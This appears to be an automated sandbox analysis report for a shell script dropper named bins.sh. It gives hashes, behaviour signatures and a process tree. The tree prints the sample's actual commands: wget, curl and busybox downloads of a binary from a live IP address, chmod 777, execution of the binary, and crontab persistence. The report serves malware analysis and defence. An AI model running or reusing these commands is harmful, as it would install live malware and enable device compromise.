Overview

overview

9

Static

static

1

bins.sh

ubuntu-18.04-amd64

7

bins.sh

debian-9-armhf

9

bins.sh

debian-9-mips

8

bins.sh

debian-9-mipsel

8

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240729-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    25-11-2024 08:21

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    747b8345f3612d35549d1bab11e30196

  • SHA1

    8b239baf781200145912fbcc64c46168d7f09fe2

  • SHA256

    c79ab0c501bb9f67602ded8b5f2eefe6ed347421585d3507580d5e70f0f0db46

  • SHA512

    b6fbe756307aa4c57bbb192804f6e517c63ef03939bad331e1304c8b6ff2c0e82c5b16916533d15c62696f04f2dbb1e0535c7ed6403ac2b6478d36997edce994

  • SSDEEP

    96:PRJkI8scWD3b9eGyBNVGWbyT9Cjt9tokDAGRJSI8pOtuBNVGW1QD3b9eGX9N0TVV:PRJkScWD3b9eGxRC5RJ7L3b9eGA

Score
9/10
antivmdefense_evasiondiscoveryexecutionpersistenceprivilege_escalatio

Malware Config

Signatures

  • Contacts a large (2174) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 1 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    executionpersistenceprivilege_escalatio
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

    antivm
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 1 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:643
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:645
        • /usr/bin/wget
          wget http://216.126.231.240/bins/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
          2⤵
          • Writes file to tmp directory
          PID:647
        • /usr/bin/curl
          curl -O http://216.126.231.240/bins/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
          2⤵
          • Checks CPU configuration
          • Writes file to tmp directory
          PID:673
        • /bin/busybox
          /bin/busybox wget http://216.126.231.240/bins/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
          2⤵
          • Writes file to tmp directory
          PID:675
        • /bin/chmod
          chmod 777 rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
          2⤵
          • File and Directory Permissions Modification
          PID:680
        • /tmp/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
          ./rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
          2⤵
          • Executes dropped EXE
          • Renames itself
          • Reads runtime system information
          PID:682
          • /bin/sh
            sh -c "crontab -l"
            3⤵
              PID:685
              • /usr/bin/crontab
                crontab -l
                4⤵
                  PID:686
              • /bin/sh
                sh -c "crontab -"
                3⤵
                  PID:688
                  • /usr/bin/crontab
                    crontab -
                    4⤵
                    • Creates/modifies Cron job
                    PID:689
              • /bin/rm
                rm rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
                2⤵
                  PID:704
                • /usr/bin/wget
                  wget http://216.126.231.240/bins/l6UYEbDnZWqFBl7H8QcUiPuhe6ICjSLcyd
                  2⤵
                  • System Network Configuration Discovery
                  PID:707

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • /tmp/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
                Filesize

                141KB

                MD5

                3ca8decdb1e52c423c521bfff02ac200

                SHA1

                8621ecd6807109b8541912ad9e134f6fb49bfd48

                SHA256

                dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

                SHA512

                b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

                Download Submit

              • /var/spool/cron/crontabs/tmp.0wAEJB
                Filesize

                210B

                MD5

                5d08140afc4cdd9b10bb69889b4f0f87

                SHA1

                13dc92cccadf6dd5f352bd417cd7b20739084277

                SHA256

                ba910712b9c92b35d2c3af407406060d38c70ed482b8b1ef5393d613c0be4097

                SHA512

                e33db6c8ee185af5fe038ae6475790a5b83089f3e52e7034b671a575e2cbd8d781a741a02ac641872e44459e041ed69536b7241fc8c9bc4e980e154abff38e23

                Download Submit